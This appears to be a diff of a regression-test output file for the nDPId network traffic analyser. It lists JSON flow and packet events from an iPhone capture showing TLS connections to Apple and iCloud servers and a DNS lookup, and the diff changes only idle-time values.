+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454599396,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454599396,"pkt":"AQBeAAD7xGGLNYKpCABFAABeopUAAP8RdUTAqAIR4AAA+xTpFOkASvALAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1582454599568,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454599568,"pkt":"MzMAAAACxGGLNYKpht1gCzl3ABA6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQA9fgAAAAABAcRhizWCqQ=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454599929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454599929,"pkt":"xiwDYGpkxGGLNYKpCABFAABDumIAAP8Re+TAqAIRwKgCAf43ADUALyJV0zQBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 